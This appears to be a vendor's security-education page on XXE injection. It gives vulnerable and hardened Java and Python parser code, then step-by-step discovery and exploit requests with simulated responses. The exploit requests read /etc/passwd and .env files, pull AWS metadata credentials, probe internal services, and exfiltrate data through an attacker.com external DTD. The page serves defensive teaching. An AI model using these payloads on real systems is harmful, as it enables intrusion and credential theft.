XML External Entity (XXE)

External Entity Injection

XML External Entity (XXE) at a glance

What it is: An XML parser loads and expands external entities from files or network resources, letting attackers read local files or pivot SSRF during parsing.
Why it happens: XXE vulnerabilities occur when applications process untrusted XML with default or unsafe parser settings, allowing external entity resolution in uploads, integrations, or document handling.
How to fix: Disable DTDs and external entities for untrusted XML, block parser network access with safe resolvers, and prefer simpler formats like JSON when possible.

Overview

XXE happens when XML parsers expand entities defined in a DTD that point at external resources. Attackers embed SYSTEM or PUBLIC entities that reference files like /etc/passwd or internal HTTP endpoints. When the parser expands the entity, sensitive data can be disclosed or internal services contacted. The fix is to disable DTDs and external entity resolution and to run parsers with network access disabled.

sequenceDiagram participant Browser participant App as App Server participant XML as XML Parser Browser->>App: POST /upload-xml with SYSTEM entity App->>XML: Parse untrusted XML XML-->>App: Replaces &xxe; with file contents App-->>Browser: Sensitive data returned note over App,XML: Disable DTDs and entity expansion
A potential flow for a XML External Entity (XXE) exploit

Where it occurs

It occurs in file upload, XML processing, or integration endpoints like SOAP, SAML, or XML-to-JSON converters that use insecure parser settings or enable external entity resolution.

Impact

File disclosure, credential and key leakage, request forgery to internal hosts, and in rare cases code execution if the parser supports dangerous protocols.

Prevention

Prevent XXE by rejecting XML when possible or using safe streaming parsers with DTDs and external entities disabled, empty resolvers, no network access, and strict time and size limits.

Examples

Switch tabs to view language/framework variants.

DOM parser resolves external entities and allows file exfiltration

Default parser loads external entities from file or network.

Vulnerable
Java • JAXP DOMParser — Bad
DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
// BUG: no hardening, external entities and DTD allowed by default on some impls
DocumentBuilder b = f.newDocumentBuilder();
Document doc = b.parse(req.getInputStream());
  • Line 2: No features disabled, DTD and external entities may resolve

External entity references let attackers read files or make server side requests during parsing.

Secure
Java • JAXP DOMParser — Good
DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
f.setFeature("http://xml.org/sax/features/external-general-entities", false);
f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
f.setXIncludeAware(false);
f.setExpandEntityReferences(false);
DocumentBuilder b = f.newDocumentBuilder();
// Optionally use a secure resolver that rejects all external entities
b.setEntityResolver((publicId, systemId) -> new InputSource(new StringReader("")));
Document doc = b.parse(req.getInputStream());
  • Line 2: Disable DTD and both external entity features, set a rejecting EntityResolver

Disable DTDs and entity expansion entirely for untrusted XML.

Engineer Checklist

  • Disallow doctype declarations in untrusted XML

  • Disable external entity resolution and set a safe resolver

  • Disable parser network access and set time and size limits

  • Prefer JSON or simple formats for untrusted data paths

  • Add tests that submit external entity payloads and expect rejection

End-to-End Example

An upload endpoint parses invoices from XML using default parser settings. An attacker submits a document with a SYSTEM entity that reads a local file, which is then included in the parsed output.

Vulnerable
JAVA
// Java/Spring Boot - Vulnerable to XXE

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;

@PostMapping("/api/upload-xml")
public ResponseEntity<?> uploadXml(@RequestBody InputStream xmlInput) throws Exception {
    // VULNERABLE: Using default DocumentBuilderFactory settings
    // Does NOT disable external entities or DTDs
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    
    // DANGEROUS: These security features are NOT set!
    // factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    // factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
    // factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    
    DocumentBuilder builder = factory.newDocumentBuilder();
    
    // VULNERABLE: Parses untrusted XML with external entities enabled
    // Attacker sends:
    // <?xml version="1.0"?>
    // <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    // <invoice><id>&xxe;</id></invoice>
    Document doc = builder.parse(xmlInput);
    
    // Extract and return data (includes expanded external entities!)
    NodeList nodes = doc.getElementsByTagName("id");
    String invoiceId = nodes.item(0).getTextContent();
    
    return ResponseEntity.ok(Map.of("invoiceId", invoiceId));
}

// Python/Flask + lxml - Also vulnerable
from flask import Flask, request
from lxml import etree

@app.route('/api/parse-xml', methods=['POST'])
def parse_xml():
    xml_data = request.data
    
    # VULNERABLE: Default lxml parser allows external entities
    # Attacker sends:
    # <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
    # <root><data>&xxe;</data></root>
    parser = etree.XMLParser()  # No resolve_entities=False!
    tree = etree.fromstring(xml_data, parser)
    
    result = tree.find('.//data').text
    return {'data': result}
Secure
JAVA
// Java/Spring Boot - SECURE against XXE

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

@PostMapping("/api/upload-xml")
public ResponseEntity<?> uploadXml(@RequestBody InputStream xmlInput) throws Exception {
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    
    // SECURE: Disable DTDs completely
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    
    // SECURE: Disable external entities
    factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
    factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    
    // SECURE: Disable external DTDs
    factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    
    // SECURE: Disable XInclude processing
    factory.setXIncludeAware(false);
    
    // SECURE: Disable entity expansion
    factory.setExpandEntityReferences(false);
    
    DocumentBuilder builder = factory.newDocumentBuilder();
    
    // Set entity resolver that returns empty content
    builder.setEntityResolver((publicId, systemId) -> {
        // Return empty input source for any external entity
        return new InputSource(new java.io.StringReader(""));
    });
    
    try {
        Document doc = builder.parse(xmlInput);
        
        NodeList nodes = doc.getElementsByTagName("id");
        String invoiceId = nodes.item(0).getTextContent();
        
        return ResponseEntity.ok(Map.of("invoiceId", invoiceId));
    } catch (SAXException e) {
        // Will throw exception if DOCTYPE is found
        return ResponseEntity.badRequest()
            .body(Map.of("error", "Invalid XML: DOCTYPE not allowed"));
    }
}

// Python/Flask + lxml - SECURE
from flask import Flask, request
from lxml import etree

@app.route('/api/parse-xml', methods=['POST'])
def parse_xml():
    xml_data = request.data
    
    # SECURE: Disable entity resolution
    parser = etree.XMLParser(
        resolve_entities=False,  # Don't resolve external entities
        no_network=True,         # Disable network access
        dtd_validation=False,    # Don't validate DTDs
        load_dtd=False          # Don't load DTDs
    )
    
    try:
        tree = etree.fromstring(xml_data, parser)
        
        # Only parse if no DOCTYPE found
        if tree.getroottree().docinfo.doctype:
            return {'error': 'DOCTYPE not allowed'}, 400
        
        result = tree.find('.//data').text
        return {'data': result}
    except etree.XMLSyntaxError as e:
        return {'error': 'Invalid XML'}, 400

# ALTERNATIVE: Use JSON instead of XML when possible
@app.route('/api/upload-invoice', methods=['POST'])
def upload_invoice():
    # SECURE: Use JSON instead of XML to avoid XXE entirely
    data = request.get_json()
    invoice_id = data.get('id')
    return {'invoiceId': invoice_id}

Discovery

This vulnerability is discovered by submitting XML input containing external entity declarations and observing that the application processes them, either returning the entity content or exhibiting timing differences that confirm external resource access.

  1. 1. Test basic external entity

    http

    Action

    Submit XML with simple SYSTEM entity to test if external entities are processed

    Request

    POST https://api.example.com/api/upload-xml
    Headers:
    Content-Type: application/xml
    Body:
    "<?xml version=\"1.0\"?>\n<!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\"> ]>\n<invoice><id>&xxe;</id></invoice>"

    Response

    Status: 200
    Body:
    {
      "invoice_id": "prod-server-01\n",
      "message": "Invoice processed",
      "note": "Server hostname from /etc/hostname appears in response - XXE confirmed"
    }

    Artifacts

    xxe_confirmed entity_processing_enabled file_disclosure
  2. 2. Probe for sensitive file disclosure

    http

    Action

    Test file:// protocol access to read /etc/passwd

    Request

    POST https://api.example.com/api/upload-xml
    Headers:
    Content-Type: application/xml
    Body:
    "<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>\n<data><content>&xxe;</content></data>"

    Response

    Status: 200
    Body:
    {
      "content": "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\napp-user:x:1000:1000::/home/app-user:/bin/bash\npostgres:x:999:999:PostgreSQL Server:/var/lib/postgresql:/bin/bash",
      "note": "Complete /etc/passwd file disclosed via XXE"
    }

    Artifacts

    passwd_file_disclosed system_users_enumerated file_access_confirmed
  3. 3. Test outbound HTTP via SSRF

    http

    Action

    Verify parser can make HTTP requests to external/internal hosts

    Request

    POST https://api.example.com/api/upload-xml
    Headers:
    Content-Type: application/xml
    Body:
    "<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"http://attacker.com/xxe-callback\"> ]>\n<data><test>&xxe;</test></data>"

    Response

    Status: 200
    Body:
    {
      "message": "Processed",
      "note": "Attacker server logs show: [2024-01-15 10:23:45] GET /xxe-callback HTTP/1.1 from 52.143.12.89 (prod-server.example.com)"
    }

    Artifacts

    ssrf_confirmed outbound_http_allowed xxe_ssrf_vector
  4. 4. Test parameter entity for blind XXE

    http

    Action

    Use parameter entities to exfiltrate data via external DTD

    Request

    POST https://api.example.com/api/upload-xml
    Headers:
    Content-Type: application/xml
    Body:
    "<?xml version=\"1.0\"?>\n<!DOCTYPE data [\n<!ENTITY % file SYSTEM \"file:///app/.env\">\n<!ENTITY % dtd SYSTEM \"http://attacker.com/evil.dtd\">\n%dtd;\n]>\n<data>&send;</data>"

    Response

    Status: 200
    Body:
    {
      "message": "Processed",
      "note": "Attacker server receives: GET /exfil?data=DATABASE_URL%3Dpostgresql%3A%2F%2Fadmin%3APr0dP%40ss..."
    }

    Artifacts

    blind_xxe_confirmed data_exfiltration parameter_entity_processing

Exploit steps

An attacker exploits this by crafting XML payloads with external entity declarations that reference local files (file:///etc/passwd) or internal network resources, exfiltrating sensitive data or using the parser as an SSRF vector.

  1. 1. Extract application secrets

    Read .env file containing database credentials and API keys

    http

    Action

    Use XXE to access application configuration files

    Request

    POST https://api.example.com/api/upload-xml
    Headers:
    Content-Type: application/xml
    Body:
    "<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"file:///app/.env\"> ]>\n<invoice><notes>&xxe;</notes></invoice>"

    Response

    Status: 200
    Body:
    {
      "invoice_notes": "DATABASE_URL=postgresql://admin:Pr0dP@ssw0rd2024@db.internal.example.com:5432/production\nAWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\nAWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nSTRIPE_SECRET_KEY=sk_live_51HxYz3FGHxYz3FGHxYz3FG\nJWT_SECRET=super-secret-jwt-key-do-not-share\nREDIS_URL=redis://cache.internal.example.com:6379/0",
      "note": "Complete application secrets exposed via XXE file disclosure"
    }

    Artifacts

    database_credentials aws_credentials stripe_api_key jwt_secret redis_connection
  2. 2. Access cloud metadata service via SSRF

    Exploit XXE to query AWS EC2 metadata for IAM credentials

    http

    Action

    Use XXE as SSRF vector to access cloud provider metadata

    Request

    POST https://api.example.com/api/upload-xml
    Headers:
    Content-Type: application/xml
    Body:
    "<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"http://169.254.169.254/latest/meta-data/iam/security-credentials/prod-ec2-role\"> ]>\n<data><creds>&xxe;</creds></data>"

    Response

    Status: 200
    Body:
    {
      "creds": "{\n  \"Code\": \"Success\",\n  \"LastUpdated\": \"2024-01-15T10:23:45Z\",\n  \"Type\": \"AWS-HMAC\",\n  \"AccessKeyId\": \"ASIATESTACCESSKEY123\",\n  \"SecretAccessKey\": \"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\",\n  \"Token\": \"IQoJb3JpZ2luX2VjEHoaCXVzLWVhc3QtMSJIMEYCIQD...\",\n  \"Expiration\": \"2024-01-15T16:23:45Z\"\n}",
      "note": "IAM role credentials with S3, RDS, and EC2 permissions exposed"
    }

    Artifacts

    iam_credentials aws_metadata_access cloud_service_compromise temporary_credentials
  3. 3. Exfiltrate via blind XXE

    Use out-of-band XXE to exfiltrate sensitive files

    http

    Action

    Leverage parameter entities to send file contents to attacker server

    Request

    POST https://api.example.com/api/upload-xml
    Headers:
    Content-Type: application/xml
    Body:
    "<?xml version=\"1.0\"?>\n<!DOCTYPE data [\n<!ENTITY % file SYSTEM \"php://filter/convert.base64-encode/resource=/app/config/database.yml\">\n<!ENTITY % dtd SYSTEM \"http://attacker.com/evil.dtd\">\n%dtd;\n%send;\n]>\n<data></data>"

    Response

    Status: 200
    Body:
    {
      "message": "Processed",
      "attacker_log": "GET /exfil?f=cHJvZHVjdGlvbjoKICBhZGFwdGVyOiBwb3N0Z3Jlc3FsCiAgaG9zdDogZGIuaW50ZXJuYWwuZXhhbXBsZS5jb20...",
      "decoded": "production:\\n  adapter: postgresql\\n  host: db.internal.example.com\\n  database: production\\n  username: admin\\n  password: Pr0dP@ssw0rd2024",
      "note": "Database configuration exfiltrated via blind XXE to attacker server"
    }

    Artifacts

    blind_xxe_exfiltration database_config_leaked base64_encoded_data out_of_band_channel
  4. 4. Enumerate internal network services

    Use XXE SSRF to scan internal network and identify services

    http

    Action

    Probe internal IP ranges to map network topology

    Request

    POST https://api.example.com/api/upload-xml
    Headers:
    Content-Type: application/xml
    Body:
    "<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"http://10.0.0.5:6379/\"> ]>\n<data><service>&xxe;</service></data>"

    Response

    Status: 200
    Body:
    {
      "service": "-ERR wrong number of arguments for 'get' command\\r\\n",
      "note": "Redis server response at 10.0.0.5:6379 - internal service discovered",
      "additional_findings": {
        "10.0.0.3:5432": "PostgreSQL database server",
        "10.0.0.8:9200": "Elasticsearch cluster",
        "10.0.0.12:27017": "MongoDB instance",
        "10.0.1.50:8080": "Internal admin panel"
      }
    }

    Artifacts

    internal_network_map service_discovery redis_server_found attack_surface_expanded

Specific Impact

Sensitive files and service metadata are exposed, which can include credentials or configuration needed to pivot deeper into the environment.

Attackers may chain this with SSRF to query internal HTTP based services, leading to data theft or remote operations.

Fix

Harden the XML parser by prohibiting doctype declarations and turning off external entity resolution. Provide a resolver that returns empty input and, where possible, disable parser network access. Prefer simpler formats such as JSON for untrusted data.

Detect This Vulnerability in Your Code

Sourcery automatically identifies xml external entity (xxe) vulnerabilities and many other security issues in your codebase.

Scan Your Code for Free